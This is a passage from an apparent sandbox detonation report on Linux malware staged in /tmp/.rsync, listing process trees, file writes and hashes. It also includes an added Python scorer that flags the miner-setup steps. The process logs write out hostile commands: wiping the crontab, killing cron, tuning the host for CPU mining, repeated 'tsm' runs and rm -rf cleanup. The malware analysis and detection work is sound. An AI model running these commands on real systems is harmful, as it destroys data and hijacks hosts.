| File opened for reading | /proc/510/stat | /bin/ps | N/A |
| File opened for reading | /proc/698/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/729/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/14/status | /bin/ps | N/A |
| File opened for reading | /proc/17/cmdline | /bin/ps | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/.proc | /tmp/.rsync/a/stop | N/A |
Processes
/tmp/.rsync/a/stop
[/tmp/.rsync/a/stop]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/bin/ps
[ps x]
/bin/grep
[grep cron]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/rm
[rm -rf .proc]
Network
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsel-20240418-en
Max time kernel
147s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
Processes
/tmp/.rsync/c/go
[/tmp/.rsync/c/go]
/bin/uname
[uname -m]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsbe-20240611-en
Max time kernel
2s
Command Line
Signatures
Processes
/tmp/.rsync/c/golan
[/tmp/.rsync/c/golan]
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-armhf-20240611-en
Max time kernel
17s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/.rsync/a/upd | /tmp/.rsync/a/upd | N/A |
Enumerates running processes
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /sbin/sysctl | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/pkill | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/node | /tmp/.rsync/a/a | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/150/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/22/stat | /bin/ps | N/A |
| File opened for reading | /proc/138/status | /bin/ps | N/A |
| File opened for reading | /proc/22/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/700/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/314/status | /bin/ps | N/A |
| File opened for reading | /proc/8/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/301/status | /bin/ps | N/A |
| File opened for reading | /proc/6/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/275/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/690/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/29/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/668/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/165/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/314/stat | /bin/ps | N/A |
| File opened for reading | /proc/411/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/4/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/460/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/217/stat | /bin/ps | N/A |
| File opened for reading | /proc/691/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/699/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/41/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/29/stat | /bin/ps | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /sbin/sysctl | N/A |
| File opened for reading | /proc/672/status | /bin/ps | N/A |
| File opened for reading | /proc/13/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/147/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/278/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/25/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/691/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/killall | N/A |
| File opened for reading | /proc/97/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/415/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/701/status | /bin/ps | N/A |
| File opened for reading | /proc/41/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/668/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/269/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/28/stat | /bin/ps | N/A |
| File opened for reading | /proc/3/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/670/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/sys/kernel/pid_max | /bin/ps | N/A |
| File opened for reading | /proc/23/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/41/stat | /bin/ps | N/A |
| File opened for reading | /proc/13/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/4/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/643/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/13/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/696/stat | /bin/ps | N/A |
| File opened for reading | /proc/28/cmdline | /usr/bin/pkill | N/A |
| File opened for reading | /proc/22/status | /bin/ps | N/A |
| File opened for reading | /proc/41/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/461/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/646/stat | /bin/ps | N/A |
| File opened for reading | /proc/672/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/15/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/11/stat | /bin/ps | N/A |
| File opened for reading | /proc/13/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/669/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/15/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/275/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/415/status | /usr/bin/pkill | N/A |
| File opened for reading | /proc/147/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/217/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/3/status | /usr/bin/pkill | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/upd | /tmp/.rsync/a/a | N/A |
| File opened for modification | /tmp/.rsync/a/.proc | /tmp/.rsync/a/stop | N/A |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/bash.pid | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/a | N/A |
Processes
/tmp/.rsync/a/a
[/tmp/.rsync/a/a]
/usr/bin/crontab
[crontab -r]
/bin/cat
[cat dir.dir]
/usr/bin/nproc
[nproc]
/sbin/sysctl
[sysctl -w vm.nr_hugepages=1]
/usr/bin/find
[find /sys/devices/system/node/node* -maxdepth 0 -type d]
/sbin/modprobe
[modprobe msr]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep AMD Ryzen]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep Intel]
/bin/chmod
[chmod u+x upd]
/bin/chmod
[chmod 777 a anacron cron dir.dir run stop upd]
/tmp/.rsync/a/upd
[./upd]
/tmp/.rsync/a/run
[./run]
/tmp/.rsync/a/stop
[./stop]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/bin/ps
[ps x]
/bin/grep
[grep cron]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/rm
[rm -rf .proc]
/bin/sleep
[sleep 10]
/bin/cat
[cat dir.dir]
/bin/uname
[uname -m]
Network
Files
/tmp/.rsync/a/dir.dir
| MD5 | b3d878adcf4672bbd1f31cffac10c769 |
| SHA1 | ce5798837933ece35a7e26a0a3dc06cab19c6275 |
| SHA256 | ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7 |
| SHA512 | 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c |
/tmp/.rsync/a/upd
| MD5 | a136fbe534c2487d3c89bd6a26847bd0 |
| SHA1 | 11b9362ba79b67dd5d5baf7cf11e0003f049d6e0 |
| SHA256 | 419a443ff93475ef3abb6e71e5a94e56aea8b7c1f1c4402b3662425815432d46 |
| SHA512 | 85047cf9d22037d2581ae41275107b243c0bb3259b57fe46bd3fd04a1abe75a7fdeace8a9eae1fae31349a00183206b40259ab3957db8f4f16a79e67133485e9 |
/tmp/.rsync/a/bash.pid
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
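Reading the behavioral2 process tree above as a sequence rather than as isolated signatures: the dropped `a` script wipes the user crontab (`crontab -r`), sizes the host (`nproc`, NUMA node listing), tunes it for a CPU miner (`sysctl -w vm.nr_hugepages=1`, `modprobe msr`, a CPU-vendor grep on `/proc/cpuinfo`), marks its payloads world-writable, and then runs `stop`, which kills any existing `cron` process by name before `run` starts its own. The many "Reads runtime system information" rows attributed to `pkill`, `killall` and `ps` are those utilities walking `/proc/<pid>/{status,cmdline,stat}` to find `cron`, a side effect of the `stop` script rather than reconnaissance by the sample itself. The following scorer is an added example, not code from the report or from the sample: it parses process-tree lines in the report's own two-line format (executable path, then argv in brackets) and flags the steps above. The indicator names, weights and the `/tmp/.<hidden-dir>` rule are my own triage heuristics, and the sample tree is copied from the page.

```python
"""Score a sandbox process tree for the miner-setup sequence seen in behavioral2.

Added example (not part of the report or the sample). Input lines follow the
report's format: executable path on one line, argv in [brackets] on the next.
"""
import re

# Constructed from the behavioral2 process tree on this page (argv is shown the
# way the report prints it, i.e. without shell quoting).
SAMPLE_TREE = """\
/tmp/.rsync/a/a
[/tmp/.rsync/a/a]
/usr/bin/crontab
[crontab -r]
/usr/bin/nproc
[nproc]
/sbin/sysctl
[sysctl -w vm.nr_hugepages=1]
/sbin/modprobe
[modprobe msr]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep AMD Ryzen]
/bin/chmod
[chmod 777 a anacron cron dir.dir run stop upd]
/tmp/.rsync/a/upd
[./upd]
/usr/bin/pkill
[pkill -9 cron]
/usr/bin/killall
[killall -9 cron]
/bin/ps
[ps x]
/bin/grep
[grep cron]
"""

# Indicator name -> (regex over "<exe> <argv>", weight). Weights are my own
# triage heuristic, not the sandbox's scoring. The vendor grep is assumed to
# select a CPU-specific MSR tweak; the page does not show what it decides.
INDICATORS = {
    "exec_from_tmp_hidden_dir": (re.compile(r"^/tmp/\.[^ ]+ "), 3),
    "crontab_wiped":            (re.compile(r" crontab -r\b"), 2),
    "hugepages_tuned":          (re.compile(r" sysctl -w vm\.nr_hugepages="), 3),
    "msr_module_loaded":        (re.compile(r" modprobe msr\b"), 3),
    "cpu_vendor_probe":         (re.compile(r" grep (AMD Ryzen|Intel)$"), 1),
    "cron_killed":              (re.compile(r" (pkill|killall) -9 cron$"), 2),
    "world_writable_payloads":  (re.compile(r" chmod 777 .*\b(anacron|cron)\b"), 1),
}


def parse_tree(text):
    """Yield (exe, argv_string) pairs from the report's two-line format."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    for exe, argv in zip(lines[0::2], lines[1::2]):
        yield exe, argv.strip("[]")


def score_tree(text):
    """Return (total_score, {indicator: [matching '<exe> <argv>' lines]}).

    Each indicator's weight counts once no matter how many lines hit it, so a
    loop that re-execs the same binary does not inflate the score.
    """
    hits = {}
    for exe, argv in parse_tree(text):
        line = f"{exe} {argv}"
        for name, (rx, _weight) in INDICATORS.items():
            if rx.search(line):
                hits.setdefault(name, []).append(line)
    total = sum(INDICATORS[name][1] for name in hits)
    return total, hits


if __name__ == "__main__":
    total, hits = score_tree(SAMPLE_TREE)
    print(f"score={total}")
    for name, lines in hits.items():
        print(f"  {name}: {lines[0]}")
```

Feeding it the behavioral2 tree lights up all seven indicators; feeding it only the `ps x | grep cron` portion scores zero, which is the point of weighting the setup steps rather than the process enumeration that the sandbox's generic signatures fire on.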
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-armhf-20240611-en
Max time kernel
10s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/a/dir.dir | /tmp/.rsync/a/run | N/A |
| File opened for modification | /tmp/.rsync/a/bash.pid | /tmp/.rsync/a/run | N/A |
Processes
/tmp/.rsync/a/run
[/tmp/.rsync/a/run]
/tmp/.rsync/a/stop
[./stop]
/bin/sleep
[sleep 10]
/bin/cat
[cat dir.dir]
/bin/uname
[uname -m]
Network
Files
/tmp/.rsync/a/dir.dir
| MD5 | b3d878adcf4672bbd1f31cffac10c769 |
| SHA1 | ce5798837933ece35a7e26a0a3dc06cab19c6275 |
| SHA256 | ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7 |
| SHA512 | 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c |
/tmp/.rsync/a/bash.pid
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:57
Platform
debian9-mipsbe-20240611-en
Max time kernel
149s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
Processes
/tmp/.rsync/c/go
[/tmp/.rsync/c/go]
/bin/uname
[uname -m]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
